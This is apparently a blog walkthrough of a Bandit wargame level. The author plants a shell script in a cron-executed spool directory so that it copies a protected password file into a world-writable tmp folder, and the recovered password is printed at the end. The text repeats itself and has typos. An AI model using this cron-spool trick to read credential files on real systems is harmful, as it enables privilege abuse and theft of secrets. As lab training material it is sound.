Bandit 24
Objectives
Level GoalA program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Solution
alets check out the cron.d and see whats there
cool lets see whats in the cronjob
ok lets check that file in /usr/bin
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh#!/bin/bash
Ok so this script runs all scripts in the folder and then deletes them /varspool/bandit24 folder
lets try to write a script that will copy the file in /etc/bandit_pass/bandit24 to a temp directory we create
Now in Python
cp /etc/bandit_pass/bandit24 /tmp/asmithbandit24
chmod -R 777/tmp/asmithbandit24/bandit24
this is a pretty simple script but there are some permission issues we need to over come in order for it to work
first we create the directory /tmp/asmithbandit24
mkdir /tmp/asmithbandit24
Now we need to give bandit24 write access to that folder, which we accomplish by giving everyone all the permissions to that folder :)
chomd -R 777 /tmp/asmithbandit24
Now since we know when we move that file to the /var/spool/bandit24 folder it will deleted it after running. I'm going to create a script in the temp folder we created this script will copy the banditpass file and give everyone all the permissions to that file
I want to create a copy of this file to give bandti24 access to the file before copyting to the /var/spool/bandit24 folder
cat script.sh >> script1.sh
now I'm going to give bandit24 rights to the file by changing the permission before copying over to /var/spool/bandit24. again I'm going to give everyone all the permissions
now we wait for the cron to execute the script and see if bandit24 shows up in my temp folder
there it is let's see what it contains
Objectives
Level GoalA program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Solution
alets check out the cron.d and see whats there
bandit23@bandit:~$ ls /etc/cron.dcronjob_bandit22 cronjob_bandit23 cronjob_bandit24
cool lets see whats in the cronjob
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
ok lets check that file in /usr/bin
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh#!/bin/bash
myname=$(whoami)
cd /var/spool/$mynameecho "Executing and deleting all scripts in /var/spool/$myname:"for i in * .*;do if [ "$i" != "." -a "$i" != ".." ]; thenecho "Handling $i"timeout -s 9 60 ./$irm -f ./$i fidone
Ok so this script runs all scripts in the folder and then deletes them /varspool/bandit24 folder
lets try to write a script that will copy the file in /etc/bandit_pass/bandit24 to a temp directory we create
Now in Python
cp /etc/bandit_pass/bandit24 /tmp/asmithbandit24
chmod -R 777/tmp/asmithbandit24/bandit24
this is a pretty simple script but there are some permission issues we need to over come in order for it to work
first we create the directory /tmp/asmithbandit24
mkdir /tmp/asmithbandit24
Now we need to give bandit24 write access to that folder, which we accomplish by giving everyone all the permissions to that folder :)
chomd -R 777 /tmp/asmithbandit24
Now since we know when we move that file to the /var/spool/bandit24 folder it will deleted it after running. I'm going to create a script in the temp folder we created this script will copy the banditpass file and give everyone all the permissions to that file
vi script.shcp /etc/bandit_pass/bandit24 /tmp/asmithbandit24chmod -R 777 /tmp/asmithbandit24/bandit24
I want to create a copy of this file to give bandti24 access to the file before copyting to the /var/spool/bandit24 folder
cat script.sh >> script1.sh
now I'm going to give bandit24 rights to the file by changing the permission before copying over to /var/spool/bandit24. again I'm going to give everyone all the permissions
chmod -R 777 script1.shcp script1.sh /var/spool/bandit24
now we wait for the cron to execute the script and see if bandit24 shows up in my temp folder
bandit23@bandit:/tmp/asmithbandit24$ lsbandit24 script1.sh script.sh
there it is let's see what it contains
bandit23@bandit:/tmp/asmithbandit24$ cat bandit24UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Comments
Post a Comment